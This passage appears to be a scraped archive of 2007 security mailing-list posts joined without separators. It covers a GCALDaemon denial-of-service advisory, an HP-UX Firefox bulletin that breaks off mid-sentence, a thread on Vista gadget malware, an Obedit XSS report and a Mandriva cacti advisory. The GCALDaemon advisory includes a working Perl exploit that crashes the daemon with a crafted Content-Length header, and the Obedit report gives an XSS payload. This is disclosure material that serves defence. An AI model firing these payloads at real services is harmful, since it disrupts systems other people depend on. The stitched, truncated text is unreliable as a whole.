"Content-Length" header parameter is used to create a new byte array; when the
size of this structure is big enough, it could trigger a Java fatal error that
blocks the HTTP daemon:
Exception in thread "HTTP listener" java.lang.OutOfMemoryError: Java heap space
at
org.gcaldaemon.core.http.HTTPListener.readRequest(HTTPListener.java:490)
at org.gcaldaemon.core.http.HTTPListener.run(HTTPListener.java:167)
*** EXPLOIT ***
The provided proof-of-concept can trigger the issue.
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto
=> 'tcp')
or die "error: $!\n";
print "GCALDaemom DoS Expoit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 10\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";
*** FIX INFORMATION ***
This bug will be fixed in the next version of GCALDaemon.
Thanks to the GCALDaemon's developers for the great tool.
*** WORKAROUNDS ***
It should be noted that the web server has the possibility to set a group of
allowed hostnames or IP addresses; the default configuration is "allow ALL".
Users may be restricted setting the allowed hosts so that remote aggressors
cannot trigger this flaw.
*
*** LEGAL NOTICES ***
*
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.
This advisory is copyright © 2007 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: [EMAIL PROTECTED]
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 0363 560 404
[security bulletin] HPSBUX02153 SSRT061181 rev.6 - HP-UX Running Firefox, Remote Unauthorized Access or Elevation of Privileges or Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00771742 Version: 6 HPSBUX02153 SSRT061181 rev.6 - HP-UX Running Firefox, Remote Unauthorized Access or Elevation of Privileges or Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-09-20 Last Updated: 2007-09-17 Potential Security Impact: Remote unauthorized access or elevation of privileges or Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Firefox running on HP-UX. These vulnerabilities could be exploited remotely resulting in unauthorized access, elevation of privileges, or Denial of Service (DoS). References: Mozilla Foundation Security Advisory (MFSA) 2006-20, 2006-22 to 2006-25, 2006-27 to 2006-39, 2006-41 to 2006-48, 2006-50 to 2006-62, 2006-64 to 2006-73, 2006-75, 2006-76, 2007-01 to 2007-09, 2007-11 to 2007-27. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - ->Firefox prior to v2.0.0.6 running on HP-UX B.11.11 and B.11.23. BACKGROUND For a PGP signed version of this security bulletin please write to: [EMAIL PROTECTED] For further information please refer to: http://www.mozilla.org/projects/security/known-vulnerabilities.html AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 Firefox.FFOX-COM - ->action: install revision 2.0.0.6 or subsequent - -> URL: ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.6/contrib/ END AFFECTED VERSIONS RESOLUTION - ->Preliminary versions of Firefox v2.0.0.6 are available to resolve the potential vulnerabilities. These preliminary versions have received minimal testing and are localized for English only. The preliminary versions are available for download from the following url: ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.6/contrib/ For HP-UX B.11.23 (IA): - -> ffox_200600alpha_ia.depot - -> ffox_200600alpha_ia.depot.readme For HP-UX B.11.11 and B.11.23 (PA): - -> ffox_200600alpha_pa.depot - -> ffox_200600alpha_pa.depot.readme - ->This security bulletin will be revised when fully tested and localized versions of Firefox v2.0.0.6 or subsequent for HP-UX are available. - ->The most recent fully tested and localized Firefox (v2.0.0.4) is available here: http://www.hp.com/products1/unix/java/firefox/index.html MANUAL ACTION: Yes - Update - ->Install Firefox v2.0.0.6 PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa HISTORY Version:1 (rev.1) - 20 September 2006 Initial release Version:2 (rev.2) - 29 November 2006 preliminary Firefox v1.5.0.8 available Version:3 (rev.3) - 27 February 2007 preliminary Firefox v1.5.0.9 available Version:4 (rev.4) - 18 July 2007 preliminary Firefox v2.0.0.4 available Version:5 (rev.5) - 22 August 2007 fully tested and localized Firefox v2.0.0.4 available Version:6 (rev.6) - 17 September 2007 preliminary Firefox v2.0.0.6 available Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category th
RE: Re[2]: [Full-disclosure] Next generation malware: Windows Vista's gadget API
"Roger A. Grimes" <[EMAIL PROTECTED]> writes: >I'm sorry, we'll have to agree to disagree. I don't see the new attack vector >here. I, the attacker, have to make you download my malicious trojan program, >which you install on your computer. It's not so much the attack vector, it's the usability issue. This makes it just too easy to convince users to download and execute untrusted content. >But if you're worried that your users will click past 3 to 5 warning messages >to install untrusted gadgets (which they will), then completely control them >using group policy. On Joe Sixpack's PC in his den? (As you say, I think we'll have to agree to disagree on this one. Let's wait until the phishers discover it and then revisit the topic :-). Peter
XSS on Obedit v3.03
===
Obedit v3.03 - XSS Vuln.
===
Author: Ishkur
Impact: XSS and Cookie Alert
Patches: in development
---
Affected Software Description:
---
Application: Obedit
Version: 3.03
Vendor: http://www.oblius.com/?projects.obedit
Description:
obedit is a Flash-based rich text editor. It will allow a user to edit text
much like you would in an office-like application, with simple editing features
like bold, italic, justification, block indents, text color, font and size
selection, links, bullets, background color, and spell checking.
Vulns:
open to XSS and Cookie alerts via the 'save' function.
PoC Exploit:
save a document with the code:
javascript:alert("XSS");
---
Solution:
---
none as of yet
[ MDKSA-2007:184 ] - Updated cacti packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:184 http://www.mandriva.com/security/ ___ Package : cacti Date: September 17, 2007 Affected: Corporate 4.0 ___ Problem Description: A vulnerability in Cacti 0.8.6i and earlier versions allows remote authenticated users to cause a denial of service (CPU consumption) via large values of the graph_start, graph_end, graph_height, or graph_width parameters. Updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3112 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3113 ___ Updated Packages: Corporate 4.0: 0c6f53c1812f0a5e8e5ae5206812dee4 corporate/4.0/i586/cacti-0.8.6f-3.2.20060mlcs4.noarch.rpm a2a965f19a5e7071c30963026f4841bc corporate/4.0/SRPMS/cacti-0.8.6f-3.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 546c9a6b1e489ae63994efe8060f6e7a corporate/4.0/x86_64/cacti-0.8.6f-3.2.20060mlcs4.noarch.rpm a2a965f19a5e7071c30963026f4841bc corporate/4.0/SRPMS/cacti-0.8.6f-3.2.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFG7tK/mqjQ0CJFipgRAn3AAKCVaPuTwsehGrGgP1ZOidjj7x8DlwCfWesJ jwCO+qnEsfe435TT+HCFLTw= =Ek9h -END PGP SIGNATURE-
